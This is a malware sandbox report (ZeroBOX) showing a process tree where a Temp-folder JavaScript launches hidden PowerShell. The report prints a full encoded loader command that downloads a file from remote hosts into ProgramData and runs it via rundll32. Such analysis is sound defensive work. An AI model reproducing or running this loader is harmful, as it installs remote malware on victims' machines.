popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Kexvdkz.js

    808

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Kexvdkz.js" AbioticallyCirriped EvilestIsocyclic Lowered

      2100

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABwAG8AaQBuAHQAaQBsAGwAaQBzAG0AIAA9ACAAIgBoAHkAcABvAHAAaABvAG4AZQBzAGkAcwAiADsAJABIAHkAcABvAHMAdABhAHMAaQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYgB3AEIAdQBBAEcAOABBAGMAQQBCAHYAQQBHAGsAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGIAdwBCADUAQQBBAD0APQBMAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMwBBAEcAawBBAGIAZwBCAGsAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEgATQBBAFkAUQBCAGgAQQBIAEkAQQBiAEEAQgBoAEEARwA0AEEAWgBBAEEAPQBMAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABjAEEATABnAEEAeABBAEQARQBBAE4AdwBBAHUAQQBEAGMAQQBNAEEAQQA9ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwAkAG4AbwBuAGEAYwBjAHUAcwBpAG4AZwBPAHYAZQByAGcAcgBvAHcAdABoACAAPQAgACIARgByAHMAaQBrAGUAdABzACIAOwAkAHQAcgBpAG4AaQB0AGEAcgBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGsAQQBNAGcAQQB2AEEARwB3AEEAZQBnAEIAUwBBAEMAOABBAFQAQQBCAEsAQQBIAEkAQQBlAEEAQgBVAEEARwBZAEEAVwBnAEIAdABBAEQATQBBAFcAZwBCADQAQQBFAFkAQQBNAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQB5AEEAQwA0AEEATwBBAEEAMwBBAEMAOABBAFYAZwBBAHkAQQBFAE0AQQBOAHcAQQB2AEEARABZAEEAUgBnAEIAdQBBAEQARQBBAFoAdwBBADIAQQBIAEkAQQBhAFEAQgBwAEEASABFAEEAYgBBAEEAeQBBAEEAPQA9AE0AWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABRAEEATAB3AEIAMQBBAEcAVQBBAGQAdwBCAG8AQQBFAGMAQQBMAHcAQgBQAEEARgBVAEEAYwB3AEIASQBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEcAcgBvAHMAcwBlAEQAZQBtAGkAbgB1AGQAaQB0AHkAIABpAG4AIAAkAHQAcgBpAG4AaQB0AGEAcgBpAGEAbgAgAC0AcwBwAGwAaQB0ACAAIgBNAFgAIgApACAAewAkAG4AbwBuAHMAcAB1AHIAaQBvAHUAcwBTAGgAaQBwAGwAYQBwAHMAIAA9ACAAIgBDAHIAaQBtAHAAYQBnAGUAIgA7ACQAQQBsAGwAbwB5AGUAZABJAHMAbwBiAHIAbwBuAHQAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAdwBBAEMANABBAE0AZwBBAHkAQQBEAGsAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAWQBBAE0AZwBBAD0ARQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEkAQQBaAFEAQgB1AEEASABvAEEAYgB3AEIAeABBAEgAVQBBAGEAUQBCAHUAQQBHADgAQQBiAGcAQgBsAEEAQwA0AEEAWQBRAEIAMABBAEEAPQA9AEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAcwBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQgBNAEEASABVAEEAYgBnAEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQBMAGcAQgBpAEEASABJAEEARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBPAEEAQQB1AEEARABZAEEATwBRAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAFEAQQB5AEEARABBAEEAIgA7ACQAYgBpAGMAawBlAHIAZQBkACAAPQAgACIATgBvAG4AZQB0AGgAbgBvAGwAbwBnAGkAYwBhAGwAIgA7AHQAcgB5ACAAewAkAG8AcgBiAGkAdABlAGwAYQByACAAPQAgADkAMAAxADsAJABWAGUAbABvAGMAaQBvAHUAcwBsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGMAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAeQBBAEMANABBAE8AQQBBADAAQQBDADQAQQBOAHcAQQA0AEEAQQA9AD0AVwBJAHMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBFAEEARwBrAEEAYwB3AEIAbABBAEcANABBAFkAdwBCADEAQQBHADAAQQBZAGcAQgBsAEEASABJAEEAYwB3AEIARQBBAEgAVQBBAFkAdwBCAHIAQQBHAEkAQQBhAFEAQgBzAEEARwB3AEEATABnAEIAMgBBAEcARQBBAFkAdwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAYwB3AEEAPQBXAEkAcwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBZAFEAQgB5AEEARwBVAEEAWgBRAEIAeQBBAEYAQQBBAFkAUQBCAGoAQQBHAHMAQQBiAFEAQgBoAEEARwA0AEEAYwB3AEIAbwBBAEcAawBBAGMAQQBBAHUAQQBIAFEAQQBhAFEAQgB5AEEARwBVAEEAYwB3AEEAPQAiADsAJABPAHYAZQByAGIAcgB1AHQAYQBsAGkAegBhAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQAxAEEAQwA0AEEATQBRAEEAeQBBAEQAQQBBAEwAZwBBAHgAQQBEAGsAQQBOAHcAQQB1AEEARABjAEEATQBBAEEAPQBLAGoAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAEwAZwBBADIAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBnAEEAPQAiADsAJABiAHIAeQBuAHoAYQBTAGUAbABlAGMAdABlAGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABHAHIAbwBzAHMAZQBEAGUAbQBpAG4AdQBkAGkAdAB5ACkAKQA7AGkAdwByACAAJABiAHIAeQBuAHoAYQBTAGUAbABlAGMAdABlAGUAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEMAbABhAHAAaABvAGwAdABLAHkAbQBhAHQAaQBvAG4ALgBiAGUAZgByAGkAegBQAHIAZQBjAG8AbgB0AGUAbQBwAG8AcgBhAG4AZQBvAHUAcwA7ACQAYwBoAHIAbwBtAG8AbQBlAHQAZQByAEgAbwBtAG8AcABsAGEAcwB0ACAAPQAgACIAUwBjAHIAYQBnAGcAaQBsAHkAIgA7ACQAbwB0AGgAZQByAHcAYQB5AHMATgBvAG4AcAByAGUAYwBpAG8AdQBzAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBRAEEAeABBAEMANABBAE0AUQBBADQAQQBEAEkAQQBwAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB3AEEARABNAEEATABnAEEAMQBBAEQAWQBBAHAAUABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEEAQQBhAEEAQgA1AEEASABNAEEAWQBRAEIAcwBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBjAEEAQgBoAEEASABJAEEAZABBAEIAdQBBAEcAVQBBAGMAZwBCAHoAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEMAbABhAHAAaABvAGwAdABLAHkAbQBhAHQAaQBvAG4ALgBiAGUAZgByAGkAegBQAHIAZQBjAG8AbgB0AGUAbQBwAG8AcgBhAG4AZQBvAHUAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAA3ADQAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBRAHcAQgBzAEEARwBFAEEAYwBBAEIAbwBBAEcAOABBAGIAQQBCADAAQQBFAHMAQQBlAFEAQgB0AEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAEkAQQBaAFEAQgBtAEEASABJAEEAYQBRAEIANgBBAEYAQQBBAGMAZwBCAGwAQQBHAE0AQQBiAHcAQgB1AEEASABRAEEAWgBRAEIAdABBAEgAQQBBAGIAdwBCAHkAQQBHAEUAQQBiAGcAQgBsAEEARwA4AEEAZABRAEIAegBBAEMAdwBBAGMAQQBCAHkAQQBHAGsAQQBiAGcAQgAwAEEARABzAEEAVgBnAEIAMQBBAEcAVQBBAFMAZwBCAFQAQQBBAD0APQAiADsAJABkAGUAYQBkAGUAbgBzAFIAZQBzAGMAaABlAGQAdQBsAGkAbgBnACAAPQAgADYAMgAzADsAYgByAGUAYQBrADsAVgB1AGUASgBTADsAfQBWAHUAZQBKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAHAAcgBvAGcAcgBlAHMAcwBpAG8AbgBpAHMAbQAgAD0AIAAzADQAMgA7ACQATwB1AHQAdwByAGkAdABlAHMAIAA9ACAAIgBpAG4AYQBsAHQAZQByAGEAYgBsAGUAIgA7ACQAcgBlAGUAYwBoAHkAIAA9ACAAOAA2ADsAfQB9ACQAUgBlAGIAdQBjAGsAbABlACAAPQAgADkAMAAzADsAJABlAGMAdAB0AHkAcABhAGwATQBhAHQAcgBpAGwAaQBuAGUAYQByAGkAcwBtACAAPQAgADgANwAxADsAJABVAG4AcABvAHMAcwBlAHMAcwBpAHYAZQBsAHkAQQBjAGUAdABhAHQAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAYgB3AEIAeQBBAEcANABBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBsAEEAQwA0AEEAZABBAEIAMwBBAEEAPQA9ACIAOwA="

        2216

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf